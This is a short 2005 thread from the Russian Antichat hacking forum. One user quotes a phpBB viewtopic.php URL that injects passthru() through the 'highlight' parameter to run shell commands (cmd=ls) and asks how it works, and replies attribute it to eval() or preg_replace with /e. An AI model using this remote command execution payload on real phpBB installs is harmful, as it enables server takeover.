Форум АНТИЧАТ > Программирование > PHP, PERL, MySQL, JavaScript PHP-injection (phpbb)

   

Опции темы

Поиск в этой теме

Опции просмотра

PHP-injection (phpbb)   #1   06.08.2005, 00:06 Майор Постоянный Регистрация: 24.10.2004 Сообщений: 578 Провел на форуме: 2263418 Репутация: 300 PHP-injection (phpbb) Код: viewtopic.php?t=243&cmd=ls&highlight='.passthru($HTTP_GET_VARS[cmd]).' Мне стало интересно где/как происходит иньекция, но просмотрев исходники я так и не понял как это происходит=(((, просьба к грамотным людям подсказать viewtopic.php   Майор Посмотреть профиль Репутация Отправить личное сообщение для Майор Найти все сообщения от Майор Добавить в друзья   #2   06.08.2005, 02:57 qBiN Постоянный Регистрация: 20.01.2005 Сообщений: 899 Провел на форуме: 1535446 Репутация: 182 СекЛаб почитай,там описывается...   qBiN Посмотреть профиль Репутация Отправить личное сообщение для qBiN Найти все сообщения от qBiN Добавить в друзья   #3   06.08.2005, 12:28 Майор Постоянный Регистрация: 24.10.2004 Сообщений: 578 Провел на форуме: 2263418 Репутация: 300 ok, Спасибо закрывайте тему   Майор Посмотреть профиль Репутация Отправить личное сообщение для Майор Найти все сообщения от Майор Добавить в друзья   #4   06.08.2005, 12:32 Zadoxlik Постоянный Регистрация: 28.02.2005 Сообщений: 853 Провел на форуме: 3369632 Репутация: 749 Я не смотрел в код, но похоже, что значение highlight или то что от него осталось после неких операций над ним скрипта, заносится в eval(); или в preg_replace() с модификатором /e   Zadoxlik Посмотреть профиль Репутация Посетить домашнюю страницу Zadoxlik Найти все сообщения от Zadoxlik Добавить в друзья   #5   06.08.2005, 16:47 qBiN Постоянный Регистрация: 20.01.2005 Сообщений: 899 Провел на форуме: 1535446 Репутация: 182 Вроде это и написано на секлабе   qBiN Посмотреть профиль Репутация Отправить личное сообщение для qBiN Найти все сообщения от qBiN Добавить в друзья

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Безопасность в Php, Часть Iii	k00p3r	Чужие Статьи	0	11.07.2005 19:02
Использование бага PHP source injection	k00p3r	Чужие Статьи	0	13.06.2005 14:16
PHP Injection :: Возможно все!	k00p3r	Чужие Статьи	0	13.06.2005 14:10
Защищаем Php. Шаг за шагом.	k00p3r	Чужие Статьи	0	13.06.2005 11:31
phpBB User id Auth. Bypass and "admin_styles" Code Injection Exploit	madnet	Мировые новости	3	16.03.2005 23:39

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход Мой кабинет Личные сообщения Подписки Кто на форуме Поиск по форуму Главная страница форума ИНФО     Мировые новости     Статьи         Авторские статьи         Чужие Статьи Безопасность и Уязвимости     Избранное     Уязвимости         Сценарии/CMF/СMS         Форумы         Расшифровка хешей         E-Mail         ICQ         Чаты     Безопасность         *nix         Soft - *nix         Windows         Soft - Windows         Анонимность         АнтиАдмин         Защита ОС: вирусы, антивирусы, файрволы.     Электроника и Фрикинг         Новости мира "железа"         Сотовый фрикинг         Аппаратное обеспечение         Схемы и программы         Телефония и связь         Беспроводные технологии/WPAN/WLAN     Администрирование         *nix системы         Windows системы         AntiDDos - АнтиДДОС     Проверка на уязвимости Программирование     PHP, PERL, MySQL, JavaScript         ПО для Web разработчика     С/С++, C#, Delphi, .NET, Asm     Реверсинг SЕО/Финансовые задачи/Социальные сети     SЕО - тонкости, методы раскрутки         Партнерки         Услуги, Покупка и Продажа в SEO         Платежные системы: Webmoney, Yandex Деньги, РБК Деньги и т. д.         Белые методы раскрутки         Черные методы раскрутки         Обсуждение Ваших сайтов         Статьи     Покупка, Продажа, Обмен         Разное - Покупка, продажа, обмен         VPN, Proxy, Socks - Покупка, продажа         Хостинг, Dedicated, VDS, Сервера - Покупка, продажа         Инвайты, mails, базы - Покупка, продажа         Доступы, shells, ftp - Покупка, продажа         Мобильная связь, СМС - Покупка, продажа         Трафик, лоады, инсталлы, загрузки - Покупка, продажа         О Работе         Покупка, продажа, услуги в Соц. Сетях         ICQ - Покупка, продажа     Социальные сети         Покупка, продажа, услуги в Соц. Сетях     Хостинги - Hostings Оффтоп     Болталка     Forum for discussion of ANTICHAT     Квесты         Antichat's Quest Antichat     Правила форума     Новости форума     Video.Antichat         Комментарии к видео